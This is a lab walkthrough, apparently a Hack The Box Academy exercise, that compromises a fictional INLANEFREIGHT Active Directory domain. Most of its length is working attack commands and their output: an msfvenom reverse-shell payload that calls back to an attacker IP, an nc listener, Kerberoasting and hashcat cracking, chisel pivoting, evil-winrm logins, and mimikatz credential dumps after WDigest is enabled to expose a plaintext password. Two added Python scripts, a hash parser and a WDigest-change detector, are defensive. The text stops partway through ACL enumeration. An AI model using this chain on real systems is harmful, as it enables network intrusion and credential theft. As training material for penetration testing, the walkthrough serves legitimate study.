admin:My_W3bsH3ll_P@ssw0rd!
Exploitation
Now my head started spinning on how to pop a reverse shell without Metasploit, so I created an executable payload with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_Port> -f exe -o shell.exe
Now that our payload is ready, we need to upload it to the target.
Start an nc listener on my attack machine:
nc -lvnp 4466
In the terminal I then run C:\myshell.exe (or whatever your payload is named), and I have a shell.
To use native PowerShell commands, I type powershell in the shell to drop into PowerShell.
To learn the host identity and domain info, I ran Get-ChildItem Env: | ft key,value:
PS C:\> Get-ChildItem Env: | ft key,value

Key                         Value
---                         -----
ALLUSERSPROFILE             C:\ProgramData
APP_POOL_CONFIG             C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
APP_POOL_ID                 DefaultAppPool
APPDATA                     C:\Windows\system32\config\systemprofile\AppData\Roaming
CommonProgramFiles          C:\Program Files\Common Files
CommonProgramFiles(x86)     C:\Program Files (x86)\Common Files
CommonProgramW6432          C:\Program Files\Common Files
COMPUTERNAME                WEB-WIN01
ComSpec                     C:\Windows\system32\cmd.exe
DriverData                  C:\Windows\System32\Drivers\DriverData
LOCALAPPDATA                C:\Windows\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS        4
OS                          Windows_NT
Path                        C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPower...
PATHEXT                     .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE      AMD64
PROCESSOR_IDENTIFIER        AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL             25
PROCESSOR_REVISION          0101
ProgramData                 C:\ProgramData
ProgramFiles                C:\Program Files
ProgramFiles(x86)           C:\Program Files (x86)
ProgramW6432                C:\Program Files
PROMPT                      $P$G
PSExecutionPolicyPreference Bypass
PSModulePath                WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32...
PUBLIC                      C:\Users\Public
SystemDrive                 C:
SystemRoot                  C:\Windows
TEMP                        C:\Windows\TEMP
TMP                         C:\Windows\TEMP
USERDOMAIN                  INLANEFREIGHT
USERNAME                    WEB-WIN01$
USERPROFILE                 C:\Windows\system32\config\systemprofile
windir                      C:\Windows

The two values that matter here:
COMPUTERNAME : WEB-WIN01
USERDOMAIN   : INLANEFREIGHT
Now we confirm the network layout with route print:
PS C:\> route print
===========================================================================
Interface List
  7...00 50 56 94 db 4c ......vmxnet3 Ethernet Adapter #2
  3...00 50 56 94 9e af ......vmxnet3 Ethernet Adapter
  1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0       172.16.6.1     172.16.6.100     11
          0.0.0.0          0.0.0.0       10.129.0.1     10.129.25.22     15
       10.129.0.0      255.255.0.0         On-link      10.129.25.22    271
     10.129.25.22  255.255.255.255         On-link      10.129.25.22    271
   10.129.255.255  255.255.255.255         On-link      10.129.25.22    271
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
       172.16.0.0      255.255.0.0         On-link      172.16.6.100    266
     172.16.6.100  255.255.255.255         On-link      172.16.6.100    266
   172.16.255.255  255.255.255.255         On-link      172.16.6.100    266
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link      172.16.6.100    266
        224.0.0.0        240.0.0.0         On-link      10.129.25.22    271
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  255.255.255.255  255.255.255.255         On-link      172.16.6.100    266
  255.255.255.255  255.255.255.255         On-link      10.129.25.22    271
===========================================================================
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0       172.16.6.1       1
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination                     Gateway
  3    271 ::/0                                    fe80::250:56ff:fe94:a0a0
  1    331 ::1/128                                 On-link
  3    271 dead:beef::/64                          On-link
  3    271 dead:beef::202/128                      On-link
  3    271 dead:beef::15a2:99e7:f7e2:6c05/128      On-link
  7    266 fe80::/64                               On-link
  3    271 fe80::/64                               On-link
  3    271 fe80::15a2:99e7:f7e2:6c05/128           On-link
  7    266 fe80::5425:f5d2:6282:3a53/128           On-link
  1    331 ff00::/8                                On-link
  7    266 ff00::/8                                On-link
  3    271 ff00::/8                                On-link
===========================================================================
Persistent Routes:
  None
With the above output we confirm that this box is dual-homed (connected to two networks).
Two different networks exist:
- 172.16.6.0/16 → internal domain network (guessing this is where the DC is)
- 10.129.0.0/16 → external network
I tried to download fping with no luck, so I checked for live hosts on the internal network with the loop below. It was slow, but I got results:
6..7 | ForEach-Object { $i = $_; 1..254 | ForEach-Object { if (Test-Connection -ComputerName "172.16.$i.$_" -Count 1 -Quiet) { write-host "172.16.$i.$_ is UP" } } }
We got three IPs back, including our own host's IP:
PS C:\> 6..7 | ForEach-Object { $i = $_; 1..254 | ForEach-Object { if (Test-Connection -ComputerName "172.16.$i.$_" -Count 1 -Quiet) { write-host "172.16.$i.$_ is UP" } } }
172.16.6.3 is UP
172.16.6.50 is UP
172.16.6.100 is UP
Then check the password policy with net accounts /domain:
PS C:\> net accounts /domain
The request will be processed at a domain controller for domain INLANEFREIGHT.LOCAL.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              1
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
To step up our enumeration, let's download PowerView, move it to the target and import the module:
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-Command Get-DomainUser

CommandType     Name                 Version    Source
-----------     ----                 -------    ------
Function        Get-DomainUser
Then run Get-DomainUser * -spn | select samaccountname,serviceprincipalname to list accounts with SPNs.
Why do we need to check for SPN accounts?
These accounts are:
- service accounts
- tied to services (SQL, IIS, etc.)
- often have privileged access
- frequently have weak or reused passwords
- have TGS (Ticket Granting Service) tickets issued for them
PS C:\> Get-DomainUser * -spn | select samaccountname,serviceprincipalname

samaccountname serviceprincipalname
-------------- --------------------
azureconnect   adfsconnect/azure01.inlanefreight.local
backupjob      backupjob/veam001.inlanefreight.local
krbtgt         kadmin/changepw
sqltest        MSSQLSvc/DEVTEST.inlanefreight.local:1433
sqlqa          MSSQLSvc/QA001.inlanefreight.local:1433
sqldev         MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
svc_sql        MSSQLSvc/SQL01.inlanefreight.local:1433
sqlprod        MSSQLSvc/SQL02.inlanefreight.local:1433
We see that the samaccountname for the SPN in question (MSSQLSvc/SQL01.inlanefreight.local:1433) is svc_sql.
Now we can request the TGS ticket for that account in Hashcat format:
PS C:\> Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat

SamAccountName       : svc_sql
DistinguishedName    : CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
ServicePrincipalName : MSSQLSvc/SQL01.inlanefreight.local:1433
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*$033...
Let's try to crack it with hashcat:
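The hash line above has a fixed layout, and its etype field is what decides how cheap offline guessing is. The parser below is an added example (not from the writeup or PowerView) that pulls the account, realm and SPN out of a mode 13100 hash and reports which accounts are still being issued RC4 tickets, the ones a defender should move to AES-only keys and long passwords. The sample hash is constructed: real user, realm and SPN from the writeup, filler checksum and ticket bytes.

```python
"""Parse a Kerberoast hash in hashcat's mode 13100 layout and explain why it cracks fast.

Added example, not from the original writeup. Layout for etype 23 (RC4-HMAC):
    $krb5tgs$23$*<user>$<REALM>$<spn>*$<16-byte checksum>$<encrypted ticket part>
The sample hash below is constructed: the user, realm and SPN are from the
writeup, but the checksum and ticket bytes are filler, not a real ticket.
"""
import re

RC4_HMAC = 23
AES_ETYPES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

# Mode 13100 layout, as emitted by Get-DomainSPNTicket -Format Hashcat.
MODE_13100_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>.+?)\$(?P<realm>[^$*]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)

SAMPLE_HASH = (  # constructed: filler checksum and ticket bytes after the SPN
    "$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*"
    "$" + "0f" * 16 + "$" + "a1b2c3d4" * 24
)


def parse_tgs_hash(line: str) -> dict:
    """Split one hash line into its fields; raises ValueError on a bad layout."""
    line = line.strip()
    head = re.match(r"^\$krb5tgs\$(\d+)\$", line)
    if not head:
        raise ValueError("not a $krb5tgs$ line")
    etype = int(head.group(1))
    if etype in AES_ETYPES:
        # AES tickets (hashcat modes 19600/19700) use a different layout; only the
        # etype is reported here rather than guessing at the remaining fields.
        return {"etype": etype, "cipher": AES_ETYPES[etype], "user": None,
                "realm": None, "spn": None}
    m = MODE_13100_RE.match(line)
    if not m or etype != RC4_HMAC:
        raise ValueError(f"etype {etype} does not match the mode 13100 layout")
    checksum = bytes.fromhex(m["checksum"])
    if len(checksum) != 16:
        raise ValueError("RC4-HMAC checksum must be 16 bytes (HMAC-MD5)")
    edata = bytes.fromhex(m["edata"])
    return {"etype": etype, "cipher": "rc4-hmac", "user": m["user"],
            "realm": m["realm"], "spn": m["spn"],
            "checksum_len": len(checksum), "ticket_len": len(edata)}


def crack_cost_note(info: dict) -> str:
    """Why the etype decides how cheap an offline guess is."""
    if info["etype"] == RC4_HMAC:
        return ("rc4-hmac: the key is the unsalted NT hash (MD4 of the UTF-16LE password), "
                "so each guess costs one MD4, a few HMAC-MD5 calls and one RC4 decrypt; "
                "the DC issued an RC4 ticket, so this account still permits RC4")
    return (f"{info['cipher']}: the key is PBKDF2-HMAC-SHA1 over realm+username "
            "with 4096 iterations by default, so each guess costs thousands of hashes")


def rc4_service_accounts(lines) -> list:
    """Accounts whose tickets came back as RC4: the ones to move to AES-only."""
    found = []
    for line in lines:
        try:
            info = parse_tgs_hash(line)
        except ValueError:
            continue  # not a krb5tgs line, skip it
        if info["etype"] == RC4_HMAC:
            found.append(info["user"])
    return found


if __name__ == "__main__":
    parsed = parse_tgs_hash(SAMPLE_HASH)
    print(parsed)
    print(crack_cost_note(parsed))
```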
─[eu-academy-1]─[10.10.14.78]─[htb-ac-2510340@htb-hdniwpyvod]─[~]
└──╼ [★]$ hashcat -m 13100 svc_sql /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*$033e72a1673fbecec2ba32c7311a3407$...:lucky7
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/S...48c249
Time.Started.....: Wed Apr 29 10:27:05 2026 (0 secs)
Time.Estimated...: Wed Apr 29 10:27:05 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 691.4 kH/s (2.03ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: 123456 -> lovers1
Started: Wed Apr 29 10:26:56 2026
Stopped: Wed Apr 29 10:27:06 2026
The next question is "Submit the contents of the flag.txt file on the Administrator desktop on MS01", so I ran the command below to find the MS01 IP address:
PS C:\> Resolve-DnsName MS01

Name                      Type TTL  Section IPAddress
----                      ---- ---  ------- ---------
MS01.INLANEFREIGHT.LOCAL  A    1200 Answer  172.16.6.50
We are unable to connect directly to MS01 from our attack box, which means we need to set up a proxy, so I chose chisel.
I downloaded chisel, started a python3 web server on my attack machine and pulled chisel down onto the target:
PS C:\> Invoke-WebRequest http://10.10.14.30:8080/chisel_windows.exe -OutFile C:\chisel_windows.exe
Then we start chisel as a server on the target:
PS C:\> ./chisel_windows.exe server -p 1234 --socks5
2026/05/01 07:23:52 server: Fingerprint WtNKsr+iugPQBM7bYUL4YCYLT4P157tKALSdqDCixpU=
2026/05/01 07:23:52 server: Listening on http://0.0.0.0:1234
2026/05/01 07:24:42 server: session#1: Client version (1.10.0) differs from server version (1.10.1)
Now we can start chisel on our attack machine as client:
─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-nyd2s4irji]─[~]
└──╼ [★]$ chisel client -v 10.129.28.167:1234 socks
2026/05/01 09:24:42 client: Connecting to ws://10.129.28.167:1234
2026/05/01 09:24:42 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2026/05/01 09:24:42 client: tun: Bound proxies
2026/05/01 09:24:42 client: Handshaking...
2026/05/01 09:24:42 client: Sending config
2026/05/01 09:24:42 client: Connected (Latency 1.637637ms)
2026/05/01 09:24:42 client: tun: SSH connected
Because we are using socks5, we need to edit /etc/proxychains.conf to point at the address our attack machine listens on when chisel runs as a client: 127.0.0.1:1080.
Now that our proxy is set up and we have confirmed the MS01 IP, let's use evil-winrm to get into the machine and submit the flag, prefixing our command with proxychains:
proxychains evil-winrm -i 172.16.6.50 -u svc_sql -p lucky7
We can also RDP into the host:
proxychains xfreerdp /v:<Server_IP> /u:<Username> /p:<Password> /size:1920x1080
While enumerating MS01, I noticed another logged-on user:
PS C:\> query user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 tpetty                console             1  Active      none   5/1/2026 4:34 AM
 svc_sql               rdp-tcp#2           2  Active      1:16   5/1/2026 5:41 AM
Let's upload mimikatz to see if we can get a plaintext password for that user from the host:
PS C:\>upload /home/htb-ac-2510340/mimikatz.exe
Info: Uploading /home/htb-ac-2510340/mimikatz.exe to C:\\mimikatz.exe
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
Info: Upload successful!
Let's run mimikatz with the flags "privilege::debug" "sekurlsa::logonpasswords":
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 1285573 (00000000:00139dc5)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/1/2026 5:41:36 AM
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username   : MS01$
         * Domain     : INLANEFREIGHT
         * NTLM       : 8fbaa4a365f38f8148230a72efe206d3
         * SHA1       : bed51be11137d6ea159e1952b768de1f04171903
        tspkg :
        wdigest :
         * Username   : MS01$
         * Domain     : INLANEFREIGHT
         * Password   : (null)
        kerberos :
         * Username   : MS01$
         * Domain     : INLANEFREIGHT.LOCAL
         * Password   : f960d9d2546cd4dc9bb6db18486ac0a02237b7eefc49d930a58ce28cef6282f079784b53b78da3faa3bdd69ca66d4401cf96b15e45c6916808d4c9f337910913e90963bdade0212681d657abaf26011a7b6c0d4587973184ec8036b1231fb2a568c881e1d0acb561a94db0b6551fba89cf68bca82d4dfd038e93b3b21fd843f9c0425c29ce5d635381f60881d7af7498843e81a79c15a90edbafdff215271a816b672f6507cc4c3960511c544433c7f0ed1b860ba93f0754eba2e9a3f363dca78b155738ac6d7d744bf3921f61683349a81bfd963fa0d0a33b7f54b88b9ecc6f6085b4773ff4f53fa3eed27032d6c857
        ssp :
        credman :

Authentication Id : 0 ; 72704 (00000000:00011c00)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/1/2026 4:33:22 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username   : MS01$
         * Domain     : INLANEFREIGHT
         * NTLM       : 8fbaa4a365f38f8148230a72efe206d3
         * SHA1       : bed51be11137d6ea159e1952b768de1f04171903
        tspkg :
        wdigest :
         * Username   : MS01$
         * Domain     : INLANEFREIGHT
         * Password   : (null)
        kerberos :
         * Username   : MS01$
         * Domain     : INLANEFREIGHT.LOCAL
         * Password   : f960d9d2546cd4dc9bb6db18486ac0a02237b7eefc49d930a58ce28cef6282f079784b53b78da3faa3bdd69ca66d4401cf96b15e45c6916808d4c9f337910913e90963bdade0212681d657abaf26011a7b6c0d4587973184ec8036b1231fb2a568c881e1d0acb561a94db0b6551fba89cf68bca82d4dfd038e93b3b21fd843f9c0425c29ce5d635381f60881d7af7498843e81a79c15a90edbafdff215271a816b672f6507cc4c3960511c544433c7f0ed1b860ba93f0754eba2e9a3f363dca78b155738ac6d7d744bf3921f61683349a81bfd963fa0d0a33b7f54b88b9ecc6f6085b4773ff4f53fa3eed27032d6c857
        ssp :
        credman :

Authentication Id : 0 ; 1308030 (00000000:0013f57e)
Session           : RemoteInteractive from 2
User Name         : svc_sql
Domain            : INLANEFREIGHT
Logon Server      : DC01
Logon Time        : 5/1/2026 5:41:37 AM
SID               : S-1-5-21-2270287766-1317258649-2146029398-4608
        msv :
         [00000003] Primary
         * Username   : svc_sql
         * Domain     : INLANEFREIGHT
         * NTLM       : dc3ba1d16d82ac977eea8c22c5de3f82
         * SHA1       : c052c598aaed303e20658a4a6341320867d8dcc4
         * DPAPI      : 32d87218d6331c60d8448418e504b7df
        tspkg :
        wdigest :
         * Username   : svc_sql
         * Domain     : INLANEFREIGHT
         * Password   : (null)
        kerberos :
         * Username   : svc_sql
         * Domain     : INLANEFREIGHT.LOCAL
         * Password   : (null)
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!
We got back NTLM hashes, but the user we are after shows (null) as the password. Let's enable WDigest and try again to see if we get lucky. Still on the host 172.16.6.50:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
The operation completed successfully.
Then reboot the host:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> shutdown.exe /r /t 0 /f
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
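The reg add above is a single well-known registry write, and it is one of the easiest things in this chain to catch on the host. The detector below is an added example (not from the writeup) that walks JSON-lines exports of Sysmon Event ID 13 (registry value set) and Windows Security 4657 (registry value modified) and alerts when UseLogonCredential under SecurityProviders\WDigest is set to 1. The event records are constructed to mirror the change made on MS01; field names follow the Sysmon and Security schemas, the values are made up. Matching on the tail of the key path is deliberate, since Sysmon shows HKLM\System\CurrentControlSet while 4657 shows \REGISTRY\MACHINE\SYSTEM\ControlSet001.

```python
"""Flag the WDigest UseLogonCredential enablement from registry telemetry.

Added example, not from the original writeup. Sources covered:
  * Sysmon Event ID 13 (RegistryEvent: value set): TargetObject + Details
  * Security 4657 (registry value modified; needs object-access auditing
    on the key): ObjectName + ObjectValueName + NewValue
The records below are constructed; field names follow the real schemas.
"""
import json
import re

# Match the key regardless of how the source renders the hive prefix
# (HKLM\System\CurrentControlSet vs \REGISTRY\MACHINE\SYSTEM\ControlSet001).
WDIGEST_KEY_RE = re.compile(r"\\SecurityProviders\\WDigest$", re.IGNORECASE)
SYSMON_DWORD_RE = re.compile(r"DWORD\s*\((0x[0-9a-fA-F]+)\)")

CONSTRUCTED_EVENTS = r"""
{"EventID": 13, "Computer": "MS01.INLANEFREIGHT.LOCAL", "User": "INLANEFREIGHT\\svc_sql", "Image": "C:\\Windows\\System32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential", "Details": "DWORD (0x00000001)"}
{"EventID": 13, "Computer": "MS01.INLANEFREIGHT.LOCAL", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\svchost.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\Config\\LastKnownGoodTime", "Details": "QWORD (0x01dc0000)"}
{"EventID": 4657, "Computer": "WEB-WIN01.INLANEFREIGHT.LOCAL", "SubjectUserName": "admin", "ProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest", "ObjectValueName": "UseLogonCredential", "NewValue": "1"}
{"EventID": 13, "Computer": "MS01.INLANEFREIGHT.LOCAL", "User": "INLANEFREIGHT\\svc_sql", "Image": "C:\\Windows\\System32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential", "Details": "DWORD (0x00000000)"}
"""


def split_value(target_object: str):
    """'HKLM\\...\\WDigest\\UseLogonCredential' -> (key path, value name)."""
    key, _, name = target_object.rpartition("\\")
    return key, name


def check_event(ev: dict):
    """Return an alert dict if this event sets WDigest\\UseLogonCredential to 1, else None."""
    eid = ev.get("EventID")
    if eid == 13:  # Sysmon RegistryEvent (value set)
        key, name = split_value(ev.get("TargetObject", ""))
        if name.lower() != "uselogoncredential" or not WDIGEST_KEY_RE.search(key):
            return None
        m = SYSMON_DWORD_RE.search(ev.get("Details", ""))
        value = int(m.group(1), 16) if m else None
        actor, proc = ev.get("User"), ev.get("Image")
    elif eid == 4657:  # Security: registry value modified
        if (ev.get("ObjectValueName", "").lower() != "uselogoncredential"
                or not WDIGEST_KEY_RE.search(ev.get("ObjectName", ""))):
            return None
        try:
            value = int(ev.get("NewValue", ""), 0)  # accepts "1" or "0x1"
        except ValueError:
            value = None
        actor, proc = ev.get("SubjectUserName"), ev.get("ProcessName")
    else:
        return None
    if value != 1:
        return None  # setting it back to 0 (or an unparsable value) is not the enablement
    return {"host": ev.get("Computer"), "user": actor, "process": proc, "source": eid}


def scan(jsonl: str) -> list:
    """Run check_event over every non-empty JSON line; returns the alerts in order."""
    alerts = []
    for raw in jsonl.splitlines():
        if raw.strip():
            alert = check_event(json.loads(raw))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(CONSTRUCTED_EVENTS):
        print(f"WDigest plaintext caching enabled on {a['host']} by {a['user']} via {a['process']} (event {a['source']})")
```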
Now let's try mimikatz again:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 55262 (00000000:0000d7de)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/1/2026 9:40:36 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username   : MS01$
         * Domain     : INLANEFREIGHT
         * NTLM       : 2951b92fba38c91eb04c39752106d237
         * SHA1       : ae7ad0461a1f52dec0dfc42d44d939af1d3e7e75
        tspkg :
        wdigest :
         * Username   : MS01$
         * Domain     : INLANEFREIGHT
         * Password   : 38be36a55f82b1159c1ea71e3c2fcf0e7e8332e152584bd21100a99d22e100593d58231127fd1c9e5d996e63c5945fe4f4d50975e3b860f97bd88931d45c64086a296f7343ed3884f5ce0c6da1487036892d32f53281dd50dd1d133e5d4866dd1e05b24e139cd4b15e56d3d8c1575e2f5fe001ad3f4b15d3df5077c15bf46076ae4a15bfecb3cc75429b8f7ffb503efb73c7450018ddd77fa83b835a0f35bcbccf5da0acf7fd2ce87c0bbc51c34210a686c4750a107150fb581578f321445358b971ba4867fc03b236a2e5c5d9c498dadc9c5c44944518ed25afe8a99f0438457b6548e769170748b45124e21ae09984
        kerberos :
         * Username   : MS01$
         * Domain     : INLANEFREIGHT.LOCAL
         * Password   : 38be36a55f82b1159c1ea71e3c2fcf0e7e8332e152584bd21100a99d22e100593d58231127fd1c9e5d996e63c5945fe4f4d50975e3b860f97bd88931d45c64086a296f7343ed3884f5ce0c6da1487036892d32f53281dd50dd1d133e5d4866dd1e05b24e139cd4b15e56d3d8c1575e2f5fe001ad3f4b15d3df5077c15bf46076ae4a15bfecb3cc75429b8f7ffb503efb73c7450018ddd77fa83b835a0f35bcbccf5da0acf7fd2ce87c0bbc51c34210a686c4750a107150fb581578f321445358b971ba4867fc03b236a2e5c5d9c498dadc9c5c44944518ed25afe8a99f0438457b6548e769170748b45124e21ae09984
        ssp :
        credman :

Authentication Id : 0 ; 170825 (00000000:00029b49)
Session           : Interactive from 1
User Name         : tpetty
Domain            : INLANEFREIGHT
Logon Server      : DC01
Logon Time        : 5/1/2026 9:40:40 AM
SID               : S-1-5-21-2270287766-1317258649-2146029398-4607
        msv :
         [00000003] Primary
         * Username   : tpetty
         * Domain     : INLANEFREIGHT
         * NTLM       : fd37b6fec5704cadabb319cebf9e3a3a
         * SHA1       : 38afea42a5e28220474839558f073979645a1192
         * DPAPI      : da2ec07551ab1602b7468db08b41e3b2
        tspkg :
        wdigest :
         * Username   : tpetty
         * Domain     : INLANEFREIGHT
         * Password   : Sup3rS3cur3D0m@inU2eR
        kerberos :
         * Username   : tpetty
         * Domain     : INLANEFREIGHT.LOCAL
         * Password   : (null)
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!
Now we got back a plaintext password for tpetty: Sup3rS3cur3D0m@inU2eR
Let's check what this user can do in the domain:
PS C:\Users\tpetty> Import-Module .\PowerView.ps1
PS C:\Users\tpetty> $sid = Convert-NameToSid tpetty
PS C:\Users\tpetty> Get-DomainObjectACL -Identity * | ? { $_.SecurityIdentifier -eq $sid }

ObjectDN               : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID              : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : 89e95b76-444d-4c62-991a-0facbeda640c
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 56
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID              : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 56
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID              : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
